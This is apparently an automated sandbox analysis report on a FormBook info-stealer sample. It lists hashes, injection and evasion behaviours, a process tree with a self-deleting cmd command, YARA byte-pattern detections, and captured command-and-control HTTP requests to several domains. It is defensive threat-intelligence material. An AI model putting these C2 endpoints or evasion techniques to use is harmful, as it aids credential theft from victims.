Loading ...

Play interactive tourEdit tour

Analysis Report NQQWym075C.exe

Overview

General Information

Sample Name:NQQWym075C.exe
Analysis ID:321308
MD5:bf75ed61e1b1f7b310ec1d999077c4dd
SHA1:cdced77e176e38ff459cdea08941de26861647cd
SHA256:69357684ec8f83d428d2030db5f3d586718207e86457465e7fd37b3b4b7c4db2
Tags:exeFormbook

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • NQQWym075C.exe (PID: 5264 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
    • RegAsm.exe (PID: 5368 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wlanext.exe (PID: 1844 cmdline: C:\Windows\SysWOW64\wlanext.exe MD5: CD1ED9A48316D58513D8ECB2D55B5C04)
          • cmd.exe (PID: 808 cmdline: /c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • cscript.exe (PID: 6064 cmdline: C:\Windows\SysWOW64\cscript.exe MD5: 00D3041E47F99E48DD5FFFEDF60F6304)
    • NQQWym075C.exe (PID: 1744 cmdline: 'C:\Users\user\Desktop\NQQWym075C.exe' MD5: BF75ED61E1B1F7B310EC1D999077C4DD)
      • RegAsm.exe (PID: 5776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe MD5: 6FD7592411112729BF6B1F2F6C34899F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16679:$sqlite3step: 68 34 1C 7B E1
    • 0x1678c:$sqlite3step: 68 34 1C 7B E1
    • 0x166a8:$sqlite3text: 68 38 2A 90 C5
    • 0x167cd:$sqlite3text: 68 38 2A 90 C5
    • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
    00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 34 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      2.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        2.2.RegAsm.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x85c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8952:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14655:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14141:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14757:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x148cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x936a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x133bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa0e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x19747:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1a7ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        2.2.RegAsm.exe.400000.0.raw.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x16679:$sqlite3step: 68 34 1C 7B E1
        • 0x1678c:$sqlite3step: 68 34 1C 7B E1
        • 0x166a8:$sqlite3text: 68 38 2A 90 C5
        • 0x167cd:$sqlite3text: 68 38 2A 90 C5
        • 0x166bb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x167e3:$sqlite3blob: 68 53 D8 7F 8C
        2.2.RegAsm.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          2.2.RegAsm.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x77c8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x7b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x13855:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x13341:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x13957:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x13acf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x856a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x125bc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0x92e2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x18947:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x199ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 13 entries

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Multi AV Scanner detection for submitted fileShow sources
          Source: NQQWym075C.exeVirustotal: Detection: 30%Perma Link
          Source: NQQWym075C.exeReversingLabs: Detection: 48%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 4.2.NQQWym075C.exe.5fe0000.3.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: NQQWym075C.exeJoe Sandbox ML: detected
          Source: 2.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 5.2.RegAsm.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 4.2.NQQWym075C.exe.5fe0000.3.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop ebx2_2_00406899
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then pop ebx5_2_00406899
          Source: C:\Windows\SysWOW64\wlanext.exeCode function: 4x nop then pop ebx6_2_03246899
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 4x nop then pop ebx10_2_02966899

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49728
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49730
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 23.227.38.64:80 -> 192.168.2.3:49731
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 35.186.238.101:80 -> 192.168.2.3:49744
          Source: TrafficSnort IDS: 1201 ATTACK-RESPONSES 403 Forbidden 34.102.136.180:80 -> 192.168.2.3:49745
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 35.186.238.101 35.186.238.101
          Source: Joe Sandbox ViewIP Address: 198.49.23.141 198.49.23.141
          Source: Joe Sandbox ViewIP Address: 23.227.38.64 23.227.38.64
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: Joe Sandbox ViewASN Name: GOOGLEUS GOOGLEUS
          Source: Joe Sandbox ViewASN Name: CLAYERLIMITED-AS-APClayerLimitedHK CLAYERLIMITED-AS-APClayerLimitedHK
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=ldw93ncdIRpnK2+SYFZ4XxcSdaL1EJRCuxI9ZUy/FVTDpSzjKcQcxAtGWqTUr4WUWqsB HTTP/1.1Host: www.ussouthernhome.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=3sSzGDKqeoVzrX5Sn8ux2WAGTszDSWdOTpKicZCtYQqt6BLZU/lZy9O7FBLa6j9xXLzf&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.myreviewandbonuses.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=jRDzq8l+sUykxws9W99RfZyinw9UtZsC3+WzPyJGQo9muB/nYvZVAbl6dW3bW8Aotu+H HTTP/1.1Host: www.thrust-board.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=kNK7qyUr0rsKRGX6DQjm/XfEOCgL/rCBvSt6iCqDIwEC5hd1LlIznMkcIp/u79mXMRr7&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.teelinkz.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=9Sq28+gy4k4CrtJhpK8mM8fwBZ3GLEhrr70589yX6MfPm6K+L9JTnWLRwUnCkAdg62kX HTTP/1.1Host: www.not-taboo.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=M16LsldnfrVP1zxs4qqy0X/sNN1zWVH6uxw1Og8LqWL4V8CpTN5QES3cWjsEPZlyN24a HTTP/1.1Host: www.tnicholson.designConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?6l=QJ1vQpsCk7HoC7tcDYJYOCEFb+6oaJChP7LjIwOmauzAYwlZDD68O4FtKEqtEO5AoeDi&Rh=Y2MlpveH8ZUh0bF HTTP/1.1Host: www.sabaicraft.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=6yhb1plVNlXQq+RzpSC3aP+nXZqT+h1u1iqVXpUKlvKLd7IxuSoQjy9XoIojNuJhzNIO HTTP/1.1Host: www.deadroommn.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /o56q/?Rh=Y2MlpveH8ZUh0bF&6l=r4u6PaE5VJhGb5HfNIqoFHA5GyORyqjhLy9oIJBoAQE4G0DswHvYnpLSr9alOGw3azvw HTTP/1.1Host: www.keitakora.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.ussouthernhome.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 20 Nov 2020 19:14:52 GMTContent-Type: text/htmlContent-Length: 867Connection: closeServer: Apache/2Last-Modified: Fri, 10 Jan 2020 16:03:34 GMTAccept-Ranges: bytesAccept-Ranges: bytesAge: 0Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 23 61 64 5f 66 72 61 6d 65 7b 20 68 65 69 67 68 74 3a 38 30 30 70 78 3b 20 77 69 64 74 68 3a 31 30 30 25 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 7b 20 6d 61 72 67 69 6e 3a 30 3b 20 62 6f 72 64 65 72 3a 20 30 3b 20 70 61 64 64 69 6e 67 3a 20 30 3b 20 7d 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 2f 61 6a 61 78 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6a 71 75 65 72 79 2f 31 2e 31 30 2e 32 2f 6a 71 75 65 72 79 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 4a 61 76 61 53 63 72 69 70 74 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 75 72 6c 20 3d 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 3f 64 6e 3d 27 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2b 20 64 6f 63 75 6d 65 6e 74 2e 64 6f 6d 61 69 6e 20 2b 20 27 26 70 69 64 3d 39 50 4f 4c 36 46 32 48 34 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 24 28 64 6f 63 75 6d 65 6e 74 29 2e 72 65 61 64 79 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 24 28 27 23 61 64 5f 66 72 61 6d 65 27 29 2e 61 74 74 72 28 27 73 72 63 27 2c 20 75 72 6c 29 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 29 3b 0d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0d 0a 20 20 20 20 3c 62 6f 64 79 3e 0d 0a 20 20 20 20 20 20 20 20 3c 69 66 72 61 6d 65 20 69 64 3d 22 61 64 5f 66 72 61 6d 65 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 73 65 61 72 63 68 76 69 74 79 2e 63 6f 6d 2f 22 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 21 2d 2d 20 62 72 6f 77 73 65 72 20 64 6f 65 73 20 6e 6f 74 20 73 75 70 70 6f 72 74 20 69 66 72 61 6d 65 27 73 20 2d 2d 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 2f 69 66 72 61 6d 65 3e 0d 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0d 0a 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE HTML><html> <head> <title>404 Error - Page Not Found</title> <style> #ad_frame{ hei
          Source: explorer.exe, 00000003.00000000.252651061.0000000008907000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: wlanext.exe, 00000006.00000002.485637823.00000000034A5000.00000004.00000020.sdmpString found in binary or memory: http://www.sz360buy.com/d
          Source: wlanext.exe, 00000006.00000002.485456630.0000000003496000.00000004.00000020.sdmpString found in binary or memory: http://www.sz360buy.com/o56q/?6l=2CtK5nvmO
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000003.00000000.253203842.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: wlanext.exe, 00000006.00000002.489818929.0000000003DA2000.00000004.00000001.sdmpString found in binary or memory: https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000002.00000002.272602970.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.274059450.00000000011F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.261367442.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262643764.0000000001290000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000002.00000002.273804408.00000000011C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.495195854.0000000004A75000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.498598158.0000000005FE0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.262773877.00000000012C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.483267910.0000000000DF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.484905555.0000000003240000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000003.241045829.000000000176E000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000A.00000002.276248841.0000000002960000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000004.00000002.485157307.0000000001124000.00000004.00000020.sdmp, type: MEMORY
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
